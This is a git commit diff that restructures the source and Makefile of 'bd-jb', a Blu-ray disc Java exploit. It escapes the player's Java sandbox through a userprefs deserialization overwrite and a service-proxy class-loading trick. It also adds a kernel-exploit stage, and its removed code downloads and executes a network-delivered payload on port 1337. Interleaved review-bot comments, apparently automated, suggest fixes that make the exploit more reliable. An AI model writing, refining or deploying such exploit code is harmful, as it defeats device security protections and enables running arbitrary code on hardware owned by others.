Restructure source code and improve Makefile.

Andy Nguyen 2021-11-04 17:58:27 +01:00
parent 94188d249f
commit fab3db6d51
24 changed files with 169 additions and 150 deletions

1
.gitignore vendored

@ -1,4 +1,5 @@
.idea/
build/
tools/
lib/
disc/CERTIFICATE/id.bdmv


@ -1,34 +1,57 @@
CLASSES = \
com/bdjb/ExploitXlet.java \
com/bdjb/Exploit.java \
com/bdjb/ExploitInterface.java \
com/bdjb/ExploitUserPrefsImpl.java \
com/bdjb/ExploitServiceProxyImpl.java \
com/bdjb/IxcProxyImpl.java \
com/bdjb/ServiceInterface.java \
com/bdjb/ServiceImpl.java \
com/bdjb/ProviderAccessorImpl.java \
com/bdjb/PayloadClassLoader.java \
com/bdjb/Payload.java \
com/bdjb/UnsafeInterface.java \
com/bdjb/UnsafeJdkImpl.java \
com/bdjb/UnsafeSunImpl.java \
com/bdjb/API.java \
com/bdjb/JIT.java \
com/bdjb/Screen.java \
BUILD = build
BDMV = bdmv
DISC = disc
LIB = lib
SRC = src
TOOLS = tools
all:
javac com/bdjb/PayloadClassLoaderSerializer.java && java com/bdjb/PayloadClassLoaderSerializer
javac -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "lib/rt.jar:lib/bdjstack.jar" $(CLASSES)
jar cf disc/BDMV/JAR/00000.jar com/bdjb/*.class com/bdjb/*.ser com/bdjb/bluray.ExploitXlet.perm
java -cp "tools/security.jar:tools/bcprov-jdk15-137.jar:tools/tools.jar" net.java.bd.tools.security.BDSigner disc/BDMV/JAR/00000.jar
java -jar tools/bdjo.jar bdmv/bdjo.xml disc/BDMV/BDJO/00000.bdjo
java -jar tools/MovieObject.jar bdmv/MovieObject.xml disc/BDMV/MovieObject.bdmv
java -jar tools/index.jar bdmv/index.xml disc/BDMV/index.bdmv
java -jar tools/id.jar bdmv/id.xml disc/CERTIFICATE/id.bdmv
CLASSES = \
$(SRC)/com/bdjb/ExploitXlet.java \
$(SRC)/com/bdjb/Exploit.java \
$(SRC)/com/bdjb/UnsafeInterface.java \
$(SRC)/com/bdjb/UnsafeJdkImpl.java \
$(SRC)/com/bdjb/UnsafeSunImpl.java \
$(SRC)/com/bdjb/API.java \
$(SRC)/com/bdjb/JIT.java \
$(SRC)/com/bdjb/Screen.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitSandboxInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitUserPrefsImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ExploitServiceProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/IxcProxyImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceInterface.java \
$(SRC)/com/bdjb/exploit/sandbox/ServiceImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/ProviderAccessorImpl.java \
$(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoader.java \
$(SRC)/com/bdjb/exploit/sandbox/Payload.java \
$(SRC)/com/bdjb/exploit/kernel/ExploitKernelInterface.java \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
all: directory serialized classes jar bdmv
directory:
mkdir -p $(BUILD)
serialized:
javac -d $(BUILD) -sourcepath $(SRC) $(SRC)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.java
java -cp $(BUILD) com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoader.ser
rm $(BUILD)/com/bdjb/exploit/sandbox/PayloadClassLoaderSerializer.class
classes:
javac -d $(BUILD) -sourcepath $(SRC) $(JFLAGS) $(CLASSES)
jar:
rm -rf $(BUILD)/jdk
cp $(SRC)/com/bdjb/bluray.ExploitXlet.perm $(BUILD)/com/bdjb/bluray.ExploitXlet.perm
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
bdmv:
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv
java -jar $(TOOLS)/id.jar $(BDMV)/id.xml $(DISC)/CERTIFICATE/id.bdmv
clean:
rm -rf jdk/internal/misc/*.class
rm -rf com/bdjb/*.class
rm -rf com/bdjb/*.ser
rm -rf build
rm -rf META-INF
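Review bot: None of the new targets is declared phony, and `bdmv` has the same name as the directory that `BDMV = bdmv` points at, so make will consider that target up to date and skip the four `java -jar $(TOOLS)/...` steps whenever the directory exists. Adding `.PHONY: all directory serialized classes jar bdmv clean` before `all:` fixes this and also protects `jar` and `classes` from a stray file of the same name. The `clean` recipe appears to hard-code `build` where the rest of the file uses the variable; `rm -rf $(BUILD)` would keep the two in step. The jars under `$(TOOLS)` and `$(LIB)` are git-ignored and nothing in this Makefile verifies them before they are executed, so a checksum check ahead of the `jar` and `bdmv` steps would be worth adding.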


@ -1,93 +0,0 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
class Exploit implements Runnable {
static void init() {
Screen.println("[+] bd-jb by theflow");
Screen.println("[*] Disabling security manager...");
ExploitInterface[] exploits =
new ExploitInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
for (int i = 0; i < exploits.length; i++) {
try {
exploits[i].trigger();
if (System.getSecurityManager() == null) {
break;
}
} catch (Exception e) {
continue;
}
}
if (System.getSecurityManager() != null) {
Screen.println("[-] Error could not disable security manager.");
}
}
static void start() {
new Thread(new Exploit()).start();
}
public void run() {
if (System.getSecurityManager() != null) {
return;
}
try {
Screen.println("[*] Installing native API...");
API api = API.getInstance();
Screen.println("[*] Enabling JIT...");
JIT jit = JIT.getInstance();
Screen.println(
"[*] Listening for payload on "
+ InetAddress.getLocalHost().getHostAddress()
+ ":1337...");
ServerSocket serverSocket = new ServerSocket(1337);
Socket socket = serverSocket.accept();
Screen.println("[*] Downloading payload...");
InputStream inputStream = socket.getInputStream();
OutputStream outputStream = new FileOutputStream("/OS/HDD/download0/mnt_ada/payload.bin");
byte[] buf = new byte[8192];
int read;
while ((read = inputStream.read(buf)) > 0) {
outputStream.write(buf, 0, read);
}
outputStream.close();
inputStream.close();
socket.close();
Screen.println("[*] Mapping payload...");
long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
Screen.println("[+] payload: " + Long.toHexString(payload));
Screen.println("[*] Executing payload...");
int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
Screen.println("[+] Result: " + ret);
} catch (Exception e) {
Screen.println("[-] Error: " + e.getMessage());
}
}
}

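--- /dev/null
+++ b/src/com/bdjb/Exploit.java
@@ -0,0 +1,69 @@
+/*
+* Copyright (C) 2021 Andy Nguyen
+*
+* This software may be modified and distributed under the terms
+* of the MIT license. See the LICENSE file for details.
+*/
+package com.bdjb;
+import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
+import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
+import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
+import com.bdjb.exploit.kernel.ExploitKernelInterface;
+import java.io.FileOutputStream;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.InetAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+class Exploit implements Runnable {
+static void init() {
+Screen.println("[+] bd-jb by theflow");
+Screen.println("[*] Escaping Java Sandbox...");
+ExploitSandboxInterface[] exploits =
+new ExploitSandboxInterface[] {new ExploitUserPrefsImpl(), new ExploitServiceProxyImpl()};
+for (int i = 0; i < exploits.length; i++) {
+try {
+exploits[i].trigger();
+if (System.getSecurityManager() == null) {
+break;
+}
+} catch (Exception e) {
+continue;
+}
+}
+if (System.getSecurityManager() != null) {
+Screen.println("[-] Error could not disable security manager.");
+}
+}
+static void start() {
+new Thread(new Exploit()).start();
+}
+public void run() {
+if (System.getSecurityManager() != null) {
+return;
+}
+Screen.println("[*] Exploiting kernel...");
+ExploitKernelInterface[] exploits = new ExploitKernelInterface[] {};
+for (int i = 0; i < exploits.length; i++) {
+try {
+if (exploits[i].trigger()) {
+break;
+}
+} catch (Exception e) {
+continue;
+}
+}
+}
+}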
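Review bot: `init()` discards the boolean that `ExploitSandboxInterface.trigger()` now returns and decides success only from `System.getSecurityManager() == null`, while `run()` branches on the return value of `ExploitKernelInterface.trigger()`; the two loops should follow one convention, or a comment should state that the security-manager check is the authoritative one. Both `catch (Exception e) { continue; }` blocks drop the exception, so a failed stage leaves no trace; the `run()` removed by this commit printed `Screen.println("[-] Error: " + e.getMessage());` and the same line would fit in both handlers. With `new ExploitKernelInterface[] {}` empty, `run()` prints its progress line and returns without reporting any outcome, which deserves at least a comment marking the array as a placeholder. The java.io and java.net imports look unused in this version of the file.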


@ -5,8 +5,8 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.kernel;
interface ExploitInterface {
public void trigger() throws Exception;
public interface ExploitKernelInterface {
public boolean trigger() throws Exception;
}
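Review bot: The new `boolean` result of `trigger()` is documented neither on `ExploitKernelInterface` nor on `ExploitSandboxInterface` added in the next file, so implementers and callers have to guess what `true`, `false` and a thrown exception each mean. The implementations in this commit already differ: `ExploitServiceProxyImpl.trigger()` ends in an unconditional `return true;`, while `ExploitUserPrefsImpl.trigger()` returns `true` from inside a block and `false` after its `finally`. I would add a Javadoc to both interfaces along the lines of `/** Runs the stage; returns true if it took effect, false if it ran without effect; throws if it could not be attempted. */`, adjusted to the contract actually intended. The `public` modifier on an interface method is redundant and can be dropped.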


@ -0,0 +1,12 @@
/*
* Copyright (C) 2021 Andy Nguyen
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb.exploit.sandbox;
public interface ExploitSandboxInterface {
public boolean trigger() throws Exception;
}


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.FileOutputStream;
import java.io.InputStream;
@ -16,19 +16,19 @@ import java.security.Provider;
import java.security.Security;
/** Implementation of the service+proxy exploit. */
class ExploitServiceProxyImpl implements ExploitInterface {
public class ExploitServiceProxyImpl implements ExploitSandboxInterface {
private static final String SERVICE_CLASS_NAME = "com.oracle.security.Service";
private static final String NEW_INSTANCE_METHOD_NAME = "newInstance";
private static final String NEW_INSTANCE_METHOD_SIGNATURE =
"(Ljava/lang/Object;)Ljava/lang/Object;";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
private static final String JAR_URL =
"file:///app0/bdjstack/lib/ext/../../../../disc/BDMV/JAR/00000.jar";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
public void trigger() throws Exception {
public boolean trigger() throws Exception {
// Throw exception if class does not exist.
Class.forName(SERVICE_CLASS_NAME);
@ -56,5 +56,7 @@ class ExploitServiceProxyImpl implements ExploitInterface {
// Instantiate the payload class with all permissions to disable the security manager.
Class payloadClass = urlClassLoader.loadClass(PAYLOAD_CLASS_NAME);
payloadClass.newInstance();
return true;
}
}


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.FileOutputStream;
import java.io.InputStream;
@ -14,16 +14,17 @@ import java.io.OutputStream;
import org.havi.ui.HSceneFactory;
/** Implementation of the userprefs deserialization exploit. */
class ExploitUserPrefsImpl implements ExploitInterface {
private static final String MNT_ADA_USERPREFS = "/OS/HDD/download0/mnt_ada/userprefs";
public class ExploitUserPrefsImpl implements ExploitSandboxInterface {
private static final String USERPREFS_FILE = "/OS/HDD/download0/mnt_ada/userprefs";
private static final String PAYLOAD_CLASS_LOADER_SER = "/com/bdjb/PayloadClassLoader.ser";
private static final String PAYLOAD_CLASS_LOADER_SER_FILE =
"/com/bdjb/exploit/sandbox/PayloadClassLoader.ser";
public void trigger() throws Exception {
public boolean trigger() throws Exception {
try {
// Overwrite userprefs with a serialized PayloadClassLoader.
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER);
OutputStream outputStream = new FileOutputStream(MNT_ADA_USERPREFS);
InputStream inputStream = getClass().getResourceAsStream(PAYLOAD_CLASS_LOADER_SER_FILE);
OutputStream outputStream = new FileOutputStream(USERPREFS_FILE);
byte[] buf = new byte[8192];
int read;
@ -42,15 +43,19 @@ class ExploitUserPrefsImpl implements ExploitInterface {
// Instantiate the payload class.
PayloadClassLoader.getInstance().newPayload();
return true;
}
} finally {
// Restore userprefs file.
String[][] preferences = new String[9][];
preferences[3] = new String[] {"26"};
ObjectOutputStream outputStream =
new ObjectOutputStream(new FileOutputStream(MNT_ADA_USERPREFS));
new ObjectOutputStream(new FileOutputStream(USERPREFS_FILE));
outputStream.writeObject(preferences);
outputStream.close();
}
return false;
}
}
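Review bot: The `finally` block that rewrites `USERPREFS_FILE` closes its `ObjectOutputStream` only on the success path, so a failure in `writeObject` leaks the stream, can leave the file half-written, and replaces any exception already propagating from the `try`. Wrapping the write as `try { outputStream.writeObject(preferences); } finally { outputStream.close(); }` keeps the descriptor from leaking; the file targets `-source 1.4`, so try-with-resources is not available. The block is labelled "Restore userprefs file" but, as far as the hunk shows, it writes a fixed array with `preferences[3] = new String[] {"26"}` rather than the content that was there before the overwrite, and the comment should say so. `trigger()` begins in the first hunk and the lines between the hunks are not shown, so the path that reaches `return false;` cannot be checked from here.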


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.sony.gemstack.core.CoreAppContext;
import com.sony.gemstack.core.CoreIxcClassLoader;


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.security.AccessController;
import java.security.PrivilegedActionException;


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
@ -19,8 +19,8 @@ import java.security.ProtectionDomain;
class PayloadClassLoader extends ClassLoader implements Serializable {
private static final long serialVersionUID = 0x4141414141414141L;
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/Payload.class";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.Payload";
private static final String PAYLOAD_CLASS_FILE = "/com/bdjb/exploit/sandbox/Payload.class";
private static final String PAYLOAD_CLASS_NAME = "com.bdjb.exploit.sandbox.Payload";
private static PayloadClassLoader instance;


@ -5,8 +5,9 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.bdjb.exploit.sandbox.PayloadClassLoader;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
@ -14,8 +15,7 @@ import java.io.ObjectOutputStream;
class PayloadClassLoaderSerializer {
public static void main(String[] args) {
try {
ObjectOutputStream objectOutputStream =
new ObjectOutputStream(new FileOutputStream("com/bdjb/PayloadClassLoader.ser"));
ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(args[0]));
objectOutputStream.writeObject(new PayloadClassLoader());
objectOutputStream.close();
} catch (Exception e) {
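Review bot: `args[0]` is read without checking `args.length`, so running the serializer without an output path fails with an `ArrayIndexOutOfBoundsException` that falls into the generic `catch (Exception e)`, whose body is outside the hunk. The Makefile's `serialized` step depends on this file being written, so the tool should reject a missing argument explicitly, for example `if (args.length != 1) { System.err.println("usage: PayloadClassLoaderSerializer <output.ser>"); System.exit(1); }`. The catch block should also exit non-zero if it does not already, otherwise make carries on without the `.ser` file. `objectOutputStream.close()` is skipped when `writeObject` throws.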


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.oracle.ProviderAccessor;
import com.oracle.ProviderAdapter;


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import com.oracle.security.Service;
import java.util.List;


@ -5,7 +5,7 @@
* of the MIT license. See the LICENSE file for details.
*/
package com.bdjb;
package com.bdjb.exploit.sandbox;
import java.rmi.Remote;
import java.rmi.RemoteException;